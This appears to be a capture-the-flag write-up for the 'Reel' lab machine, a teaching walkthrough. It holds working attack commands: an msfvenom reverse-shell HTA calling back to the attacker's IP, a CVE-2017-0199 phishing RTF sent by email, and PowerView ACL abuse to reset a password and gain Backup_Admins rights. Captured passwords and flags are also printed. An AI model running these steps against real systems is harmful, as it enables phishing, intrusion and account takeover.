# Reel


## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and find out which services and versions are running on them.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.77 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Mon Sep 12 22:07:39 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
25/tcp open  smtp

# Nmap done at Mon Sep 12 22:08:06 2022 -- 1 IP address (1 host up) scanned in 26.56 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Mon Sep 12 22:10:40 2022 as: nmap -sCV -p21,22,25 -oN targeted 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
22/tcp open  ssh     OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.92%I=7%D=9/12%Time=631F924A%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 12 22:13:32 2022 -- 1 IP address (1 host up) scanned in 171.82 seconds
```

{% endcode %}

`Anonymous` login is enabled on the *FTP* server.

> ftp 10.10.10.77

```
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:alfa8sa): anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>
```

Inside the *FTP* server there is one directory called `documents` with some files.

> ftp> ls documents

```
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18  12:19AM                 2047 AppLocker.docx
05-28-18  02:01PM                  124 readme.txt
10-31-17  10:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.
```

Let's transfer all of them to our current machine.

> ftp> get AppLocker.docx
>
> ftp> get readme.txt
>
> ftp> get Windows\ Event\ Forwarding.docx

The `readme.txt` file says that someone is expecting `.rtf` procedure documents by email, which they will review and convert.

> cat readme.txt

```
please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.
```

The `AppLocker.docx` file (converted to `AppLocker.txt` below) describes the *AppLocker* policy in effect: hash rules for executables, installers and scripts.

> docx2txt AppLocker.docx; cat AppLocker.txt

{% code overflow="wrap" %}

```
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
```

{% endcode %}

The `Windows Event Forwarding.docx` file seems to be corrupted, so we can not see its content.

> docx2txt Windows\ Event\ Forwarding.docx

```
Failed to extract required information from <Windows Event Forwarding.docx>!
```

But, we can see an email in the metadata.

> exiftool Windows\ Event\ Forwarding.docx

```
ExifTool Version Number         : 12.44
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2017:10:31 22:13:23+01:00
File Access Date/Time           : 2022:09:13 00:41:48+02:00
File Inode Change Date/Time     : 2022:09:13 00:41:48+02:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Characters                      : 1709
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 14
Paragraphs                      : 4
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 : 
Company                         : 
Links Up To Date                : No
Characters With Spaces          : 2004
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 14.0000
```

As port *25 (SMTP)* is open, we can check with the *smtp-user-enum* tool whether the email `nico@megabank.com` is a valid recipient.

> smtp-user-enum -m RCPT -u nico@megabank.com 10.10.10.77 25

* `-m` **mode** to enumerate *SMTP* users.
* `-u` **username** to test.

```
Connecting to 10.10.10.77 25 ...
220 Mail Service ready
250 Hello.
250 OK
Start enumerating users with RCPT mode ...
[SUCC] nico@megabank.com 250 OK
```

## Exploitation

As the email is valid, the idea is to generate a malicious `.rtf` file and send it to the `nico@megabank.com` email address. There is a Python [script](https://github.com/bhdresh/CVE-2017-0199) which allows us to create such `.rtf` files. First, we'll have to generate a malicious `.hta` file with *msfvenom*, which will send us a reverse shell.

> msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f hta-psh -o malicious.hta

* `-p` indicates the type of **payload**.
* `LHOST` local **host** IP.
* `LPORT` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

On the current directory, we'll have to set a simple HTTP server, so the victim machine can download the `malicious.hta` file.

> python -m http.server 80

Now, set a *netcat* listener on port *4444* with *rlwrap*.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Finally, we can execute the script with *Python2*, and generate the `malicious.rtf` file.

> python2 41894.py -M gen -w malicious.rtf -u http://10.10.14.11/malicious.hta

* `-M` generate **malicious file** only.
* `-w` **name** of the malicious RTF file.
* `-u` path to the **HTA** **file**.

```
Generating normal RTF payload.

Generated malicious.rtf successfully
```

Finally, once we send the malicious file to `nico@megabank.com`, we should get a shell as `nico` and be able to grab the user flag.

> sendemail -f alfa8sa@megabank.com -t nico@megabank.com -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf

* `-f` **sender** email address.
* `-t` **receiver** email address.
* `-s` SMTP **server**.
* `-m` **message** to send.
* `-a` **file** attachment.

```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.77] 62436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

whoami
htb\nico

type \users\nico\desktop\user.txt
fa363aebcfa2c29897a69af385fee971
```

## Privilege Escalation

On the desktop of the user `nico` there is a file called `cred.xml`, an exported *PowerShell* `PSCredential` holding an encrypted password for the `tom` user.

> type \users\nico\desktop\cred.xml

```
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>
```

We'll have to use *PowerShell* to decode the password. The `SS` element is a DPAPI-protected *SecureString*, so it can only be recovered by the same user on the same machine that exported it, which is why this works from `nico`'s shell.

> powershell (Import-CliXml -Path \users\nico\desktop\cred.xml).GetNetworkCredential().password

```
1ts-mag1c!!!
```

Now we can log in as `tom` via *SSH*.

> sshpass -p '1ts-mag1c!!!' ssh tom@10.10.10.77

{% code overflow="wrap" %}

```
Microsoft Windows [Version 6.3.9600]                                                                                            
(c) 2013 Microsoft Corporation. All rights reserved.                                                                            

tom@REEL C:\Users\tom>whoami                                                                                                    
htb\tom
```

{% endcode %}

On the desktop of the `tom` user there is a directory called `AD Audit`.

> dir \Users\tom\Desktop

{% code overflow="wrap" %}

```
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is CC8A-33E1                                                                                              

 Directory of C:\Users\tom\Desktop                                                                                              

05/29/2018  08:57 PM    <DIR>          .                                                                                        
05/29/2018  08:57 PM    <DIR>          ..                                                                                       
05/29/2018  09:02 PM    <DIR>          AD Audit                                                                                 
               0 File(s)              0 bytes                                                                                   
               3 Dir(s)  15,771,508,736 bytes free
```

{% endcode %}

There are a few things inside `AD Audit`.

> dir "\Users\tom\Desktop\AD Audit"

{% code overflow="wrap" %}

```
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is CC8A-33E1                                                                                              

 Directory of C:\Users\tom\Desktop\AD Audit                                                                                     

05/29/2018  09:02 PM    <DIR>          .                                                                                        
05/29/2018  09:02 PM    <DIR>          ..                                                                                       
05/30/2018  12:44 AM    <DIR>          BloodHound                                                                               
05/29/2018  09:02 PM               182 note.txt                                                                                 
               1 File(s)            182 bytes                                                                                   
               3 Dir(s)  15,771,508,736 bytes free
```

{% endcode %}

The `note.txt` file says that there is no way to gain admin privileges.

> type "\Users\tom\Desktop\AD Audit\note.txt"

Inside the `BloodHound` directory we can see the `PowerView.ps1` script.

> dir "\Users\tom\Desktop\AD Audit\BloodHound"

{% code overflow="wrap" %}

```
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is CC8A-33E1                                                                                              

 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound                                                                          

05/30/2018  12:44 AM    <DIR>          .                                                                                        
05/30/2018  12:44 AM    <DIR>          ..                                                                                       
05/29/2018  08:57 PM    <DIR>          Ingestors                                                                                
10/30/2017  11:15 PM           769,587 PowerView.ps1                                                                            
               1 File(s)        769,587 bytes                                                                                   
               3 Dir(s)  15,771,508,736 bytes free
```

{% endcode %}

And inside the `Ingestors` directory there are some files and binaries.

> dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"

{% code overflow="wrap" %}

```
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is CC8A-33E1                                                                                              

 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors                                                                

05/29/2018  08:57 PM    <DIR>          .                                                                                        
05/29/2018  08:57 PM    <DIR>          ..                                                                                       
11/17/2017  12:50 AM           112,225 acls.csv                                                                                 
10/28/2017  09:50 PM             3,549 BloodHound.bin                                                                           
10/24/2017  04:27 PM           246,489 BloodHound_Old.ps1                                                                       
10/24/2017  04:27 PM           568,832 SharpHound.exe                                                                           
10/24/2017  04:27 PM           636,959 SharpHound.ps1                                                                           
               5 File(s)      1,568,054 bytes                                                                                   
               2 Dir(s)  15,771,508,736 bytes free
```

{% endcode %}

One of them, `acls.csv`, is worth transferring to our local machine. First, set up an SMB server with *impacket*.

> impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the `acls.csv` file to the `smbFolder` share.

> copy acls.csv \\10.10.14.11\smbFolder\

We can see that the file has a lot of information about objects, principals, rights and access control type.

> csvtool readable acls.csv

```
ObjectName                                        ObjectType ObjectGuid                           PrincipalName                          PrincipalType ActiveDirectoryRights ACEType                    AccessControlType IsInherited
Domain Computers@HTB.LOCAL                        GROUP                                           Domain Admins@HTB.LOCAL                GROUP         GenericAll                                       AccessAllowed     False
Domain Computers@HTB.LOCAL                        GROUP                                           Account Operators@HTB.LOCAL            GROUP         GenericAll                                       AccessAllowed     False
Domain Computers@HTB.LOCAL                        GROUP                                           Local System@HTB.LOCAL                 USER          GenericAll                                       AccessAllowed     False
...
```

If we *grep* for `tom`, we'll see that he has *WriteOwner* rights on the `claire` user.

> csvtool readable acls.csv | grep tom

```
ObjectName                                        ObjectType ObjectGuid                           PrincipalName                          PrincipalType ActiveDirectoryRights ACEType                    AccessControlType IsInherited
...
claire@HTB.LOCAL                                  USER                                            tom@HTB.LOCAL                          USER          WriteOwner                                       AccessAllowed     False
```

This means that `tom` can take ownership of the `claire` object and, as its owner, edit its DACL to grant himself the right to reset her password. We'll use `PowerView.ps1` to do it. First, open a *PowerShell* shell.

> powershell

Then, import the `PowerView.ps1` module located in the `BloodHound` directory.

> Import-Module .\PowerView.ps1

Set `tom` as the owner of the `claire` object.

> Set-DomainObjectOwner -identity claire -OwnerIdentity tom

Grant `tom` the right to reset `claire`'s password.

> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

Create a credential `$cred` with the password `alfa8sa123$!`.

> $cred = ConvertTo-SecureString "alfa8sa123$!" -AsPlainText -force

Finally, change `claire` password to the credential we just made.

> Set-DomainUserPassword -identity claire -accountpassword $cred

Now, we can log in as `claire` via SSH.

> sshpass -p 'alfa8sa123$!' ssh claire@10.10.10.77

{% code overflow="wrap" %}

```
Microsoft Windows [Version 6.3.9600]                                                                                            
(c) 2013 Microsoft Corporation. All rights reserved.                                                                            

claire@REEL C:\Users\claire>whoami                                                                                              
htb\claire
```

{% endcode %}

If we grep for `claire` in the `acls.csv` file, we'll see that she has *WriteDacl* rights on the `Backup_Admins` group.

> csvtool readable acls.csv | grep claire

```
ObjectName                                        ObjectType ObjectGuid                           PrincipalName                          PrincipalType ActiveDirectoryRights ACEType                    AccessControlType IsInherited
...
Backup_Admins@HTB.LOCAL                           GROUP                                           claire@HTB.LOCAL                       USER          WriteDacl                                        AccessAllowed     False
```

This means that `claire` can add herself to the `Backup_Admins` group.

> net group Backup_Admins claire /add

```
The command completed successfully. 
```

In order to get the right permissions, you might need to log out, and then log in again. Now, the user `claire` is in the `Backup_Admins` group.

> net group Backup_Admins

{% code overflow="wrap" %}

```
Group name     Backup_Admins                                                                                                    
Comment                                                                                                                         

Members                                                                                                                         

-------------------------------------------------------------------------------                                                 
claire                   ranj                                                                                                   
The command completed successfully.
```

{% endcode %}
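The two rights used in this chain, `tom`'s *WriteOwner* on `claire` and `claire`'s *WriteDacl* on `Backup_Admins`, are exactly what a defender should hunt for in an export like `acls.csv`. The following Python is an added example, not part of the original write-up: it parses a constructed sample in the same column layout, keeps only allowed ACEs that grant a takeover right to a principal outside an assumed set of expected admins, and searches for a chain of such rights between two principals (the `ranj` row and the right sets are constructed for the example):

```python
import csv
import io
from collections import defaultdict, deque

# Rights that let the holder take over the target object. WriteOwner and
# WriteDacl are the two used in this write-up; the others are the usual
# companions. This set is an editorial choice, not something BloodHound exports.
DANGEROUS_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
    "AllExtendedRights", "ForceChangePassword",
}

# Principals expected to hold such rights everywhere; edges from them are
# noise for this audit (assumed list, tune it to the domain being reviewed).
EXPECTED_PRINCIPALS = {
    "Domain Admins@HTB.LOCAL", "Enterprise Admins@HTB.LOCAL",
    "Administrators@HTB.LOCAL", "Local System@HTB.LOCAL",
    "Account Operators@HTB.LOCAL",
}

# Constructed sample in the acls.csv column layout shown above; not the real file.
SAMPLE_CSV = """\
ObjectName,ObjectType,ObjectGuid,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
Domain Computers@HTB.LOCAL,GROUP,,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,False
Domain Computers@HTB.LOCAL,GROUP,,Local System@HTB.LOCAL,USER,GenericAll,,AccessAllowed,False
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,ReadProperty,,AccessAllowed,False
Backup_Admins@HTB.LOCAL,GROUP,,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,False
Backup_Admins@HTB.LOCAL,GROUP,,tom@HTB.LOCAL,USER,GenericAll,,AccessDenied,False
ranj@HTB.LOCAL,USER,,Backup_Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,True
"""


def load_edges(csv_text):
    """Return (principal, right, object) edges worth a second look: allowed
    ACEs granting a takeover right to a principal not expected to hold it.
    Inherited ACEs still confer the right, so they are kept."""
    edges = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # a deny ACE grants nothing
        if row["ActiveDirectoryRights"] not in DANGEROUS_RIGHTS:
            continue
        if row["PrincipalName"] in EXPECTED_PRINCIPALS:
            continue
        edges.append((row["PrincipalName"], row["ActiveDirectoryRights"],
                      row["ObjectName"]))
    return edges


def find_path(edges, start, target):
    """Breadth-first search for the shortest chain of takeover rights from
    `start` to `target`. Returns the list of (principal, right, object) hops,
    or None when no chain exists. Group membership is not expanded here."""
    graph = defaultdict(list)
    for principal, right, obj in edges:
        graph[principal].append((right, obj))
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for right, obj in graph[node]:
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, path + [(node, right, obj)]))
    return None


if __name__ == "__main__":
    edges = load_edges(SAMPLE_CSV)
    print("suspicious grants:")
    for principal, right, obj in edges:
        print("  %s --%s--> %s" % (principal, right, obj))
    chain = find_path(edges, "tom@HTB.LOCAL", "Backup_Admins@HTB.LOCAL")
    print("chain tom -> Backup_Admins:", chain)
```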

We can see that the `Backup_Admins` group has full rights `(F)` on the `\users\administrator` directory.

> icacls \Users\Administrator

{% code overflow="wrap" %}

```
\Users\Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)                                                                            
                     HTB\Backup_Admins:(OI)(CI)(F)                                                                              
                     HTB\Administrator:(OI)(CI)(F)                                                                              
                     BUILTIN\Administrators:(OI)(CI)(F)                                                                         

Successfully processed 1 files; Failed processing 0 files
```

{% endcode %}

But, we can't see the flag yet.

> type \Users\Administrator\Desktop\root.txt

```
Access is denied.
```

On the administrator's desktop there is a directory called `Backup Scripts`, which contains some files.

> dir \Users\Administrator\Desktop

{% code overflow="wrap" %}

```
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is CC8A-33E1                                                                                              

 Directory of C:\Users\Administrator\Desktop\Backup Scripts                                                                     

11/02/2017  10:47 PM    <DIR>          .                                                                                        
11/02/2017  10:47 PM    <DIR>          ..                                                                                       
11/04/2017  12:22 AM               845 backup.ps1                                                                               
11/02/2017  10:37 PM               462 backup1.ps1                                                                              
11/04/2017  12:21 AM             5,642 BackupScript.ps1                                                                         
11/02/2017  10:43 PM             2,791 BackupScript.zip                                                                         
11/04/2017  12:22 AM             1,855 folders-system-state.txt                                                                 
11/04/2017  12:22 AM               308 test2.ps1.txt                                                                            
               6 File(s)         11,903 bytes                                                                                   
               2 Dir(s)  15,771,508,736 bytes free
```

{% endcode %}

If we search for the word `Password` in all the files, we'll find the password for the `administrator` user.

> powershell "dir | Select-String 'Password'"

{% code overflow="wrap" %}

```
BackupScript.ps1:1:# admin password                                                                                             
BackupScript.ps1:2:$password="Cr4ckMeIfYouC4n!"
```

{% endcode %}

Finally, if we log in via *SSH* as the `administrator` user, all we have to do is reap the harvest and take the root flag.

> sshpass -p 'Cr4ckMeIfYouC4n!' ssh administrator@10.10.10.77

{% code overflow="wrap" %}

```
Microsoft Windows [Version 6.3.9600]                                                                                            
(c) 2013 Microsoft Corporation. All rights reserved.                                                                            

administrator@REEL C:\Users\Administrator>whoami                                                                                
htb\administrator                                                                                                               

administrator@REEL C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt                                            
1018a0331e686176ff4577c728eaf32a
```

{% endcode %}


